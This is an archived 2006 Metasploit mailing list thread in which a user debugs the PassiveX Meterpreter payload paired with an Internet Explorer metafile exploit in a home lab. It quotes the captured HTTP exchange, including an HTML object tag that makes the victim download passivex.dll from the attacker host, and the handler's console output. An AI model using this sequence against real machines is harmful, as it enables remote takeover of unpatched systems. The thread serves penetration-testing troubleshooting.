Metasploit mailing list archives
Using the PassiveX payload
From: featuremeister at googlemail.com (Feature Meister)
Date: Fri, 5 May 2006 11:11:43 +0200
Hi, it seems as if the control does not get registered. At least there's nothing like a "PassiveX.PassiveX" or "CPassiveX" registered under HKEY_CLASSES_ROOT. The account I am trying it with has administrative privileges. Requests: ============================================================ 1st request (client -> 192.168.71.75:80): GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: de Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: 192.168.71.75 Connection: Keep-Alive ============================================================ 1st response: HTTP/1.1 200 OK [lots of garbled X-something headers] Content-Type: text/plain Content-Length: 1064 Connection: close <html><meta http-equiv='refresh' content='0; URL=http://192.168.71.75:80/oLS5EVfdp4EbzJ6E/tq0t6bYDRZpAW/VPQDnp1zZjLjxQhsbpWtWOzMYfVkt/qDEQ7gILJFcbnj4BFRE/HC4VS3s6WACBB/KIn3qj593.tiff'><body><div class='P0flswoP5lceERmtVti3aHyTGPAJp9i32I0IjMdj6MCwfOWf4Yj4qwrXIjY9OEbahogUa24mM8PTKuBTvan49hoFzD1D4WjQKF6Wey6yZjxeGUJ5RyKXUguwUL9EtJzYOZ7ZsoP3GQFQwsXH4Nz4jT3oSGsDXoEWyKTTkeLVFt7Sh1x6ZgmGTF7ZqyxaHLVcjsLkbMbaLtfHrcY7UuhGjRd1TgVGeJSBPskyOxkYQY4JXhLlAdMj8muvu9425ghD6rvPwHOKniXvqrfUyi1d8vnqB5o4M2fB29e0goJZljRLyb5FHTbFeSnKjYHivGCEMbfgxs5AhJGVeEOZZGA6pVuwDTJJ4qeL7yjvgprs84y1RuQ58aKB9amhb1LP1irBSv3mckOlVnEmQCka8K9xWBbRzI30mlTl1eHz12RVnajohpIW7iye4eEPvjM6ytFjKLmfwXNYrnhnIzuDtThTbc9yFqfIRfbXh2b1if2IkYPnvjfB2W46psjTUhXnmbFJtOemNuuvXTjg7yHSRwOtQl65umdKe33UPvWR7OVKLdxkDb9vkX9XbuT0tT5a6bvBU4eHZq7ljrSvfBdbod9Vmf7d71xUWDzKij3QLdiUEJaOJip3rQfiWket98Q0nnkZQdLKEAFBWJcdu5bZwXq9ga7iZssqrZXweGRTkI3NPWmtYWHgoKLgwwFhkThZfnyBrWSdJHiWgKJCYgOLKBDoJGdh5G3nVJjzEwM5jZ2Lfakd2s5O9cmcA71soVObXYGqrhjSRDPZfa1E0mknvV4bHZTUORp70CqlD8Nir8JzBN2CAPE71q6o'></div>One second please...</body></html> ============================================================ 2nd request (C -> 192.168.71.75:80): GET /oLS5EVfdp4EbzJ6E/tq0t6bYDRZpAW/VPQDnp1zZjLjxQhsbpWtWOzMYfVkt/qDEQ7gILJFcbnj4BFRE/HC4VS3s6WACBB/KIn3qj593.tiff HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: de Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: 192.168.71.75 Connection: Keep-Alive 2nd response: [lots of garbled X-something headers] [metafile exploit] ============================================================ 3rd request (C -> 192.168.71.75:8000): GET / HTTP/1.1 Accept: */* Accept-Language: de Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: 192.168.71.75:8000 Connection: Keep-Alive 3rd response: HTTP/1.1 200 OK Connection: close Content-type: text/html <html><object classid="CLSID:B3AC7307-FEAE-4e43-B2D6-161E68ABA838" codebase="http://192.168.71.75:8000/passivex.dll#-1,-1,-1,-1"><param name="HttpHost" value="192.168.71.75"><param name="HttpPort" value="8000"><param name="DownloadSecondStage" value="1"></object></html> ============================================================ 4th request (C -> 192.168.71.75:8000): GET /passivex.dll HTTP/1.1 Accept: application/x-cabinet-win32-x86, application/x-pe-win32-x86, application/octet-stream, application/x-setupscript, */* Accept-Language: de Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: 192.168.71.75:8000 Connection: Keep-Alive 4th response: HTTP/1.1 200 OK Connection: close Content-type: application/octet-stream [here comes passivex.dll] ============================================================ on MSFConsole I see: msf ie_xp_pfv_metafile(win32_passivex_meterpreter) > exploit [*] Starting PassiveX Handler on 192.168.71.75:8000. [*] Waiting for connections to http://192.168.71.75:80/ [*] HTTP Client connected from 192.168.71.71:1078, redirecting... [*] HTTP Client connected from 192.168.71.71:1079, sending 1452 bytes of payload... [*] Sending PassiveX main page to client... [*] Sending PassiveX DLL in HTTP response (106496 bytes)... I'm unsure if I should post the tcpdump (~ 60K compressed) to this list. Marco On 5/4/06, mmiller at hick.org <mmiller at hick.org> wrote:
On Thu, May 04, 2006 at 05:02:55PM +0200, Feature Meister wrote:Hi all, I am desperately looking for the PassiveX payload to work. I already saw some earlier postings on this list regarding this topic and also read the theory on "uninformed". What I'm trying is the following setup: attackers machine (A): OS: WinXP SP2 (de), no additional patches Metasploit Framework 2.5 Exploit: ie_xp_pfv_metafile Payload: win32_passivex_meterpreter (also win32_passivex_*) victims machine (V): OS: WinXP SP2 (en-US), no additional patches Scenario: When connecting to the HTTP-port provided by metasploit the victims machine downloads and executes the exploit. It works since the IE zone settings are changed as described. After that the exploit launches the hidden IE which then downloads the passivex dll. (I verified this by sniffing the connections) But then nothing else happens. I would have expected the meterpreter console coming up - but there's no more communication between A and V. Any hints, suggestions, ideas?The only thing I can think of that would lead to this scenario is the ActiveX control not properly registering after it is downloaded. Can you confirm that the PassiveX.PassiveX (may be CPassiveX...) class is getting registered? You can check in in the registry under HKEY_CLASSES_ROOT. If it is getting registered, then it seems like perhaps the PXHTTPHOST/PORT is not getting set properly, though that seems unlikely. Can you include the data portion of the HTTP response that the metasploit webserver sends to the client when it requests the root page? I'm mainly interested in seeing the parameters that are sent in the object.
Current thread:
- Using the PassiveX payload Feature Meister (May 04)
- Using the PassiveX payload mmiller at hick.org (May 04)
- Using the PassiveX payload Feature Meister (May 05)
- Using the PassiveX payload Feature Meister (May 05)
- Using the PassiveX payload mmiller at hick.org (May 05)
- Using the PassiveX payload Feature Meister (May 05)
- Using the PassiveX payload mmiller at hick.org (May 05)
- Using the PassiveX payload Feature Meister (May 05)
- Using the PassiveX payload mmiller at hick.org (May 04)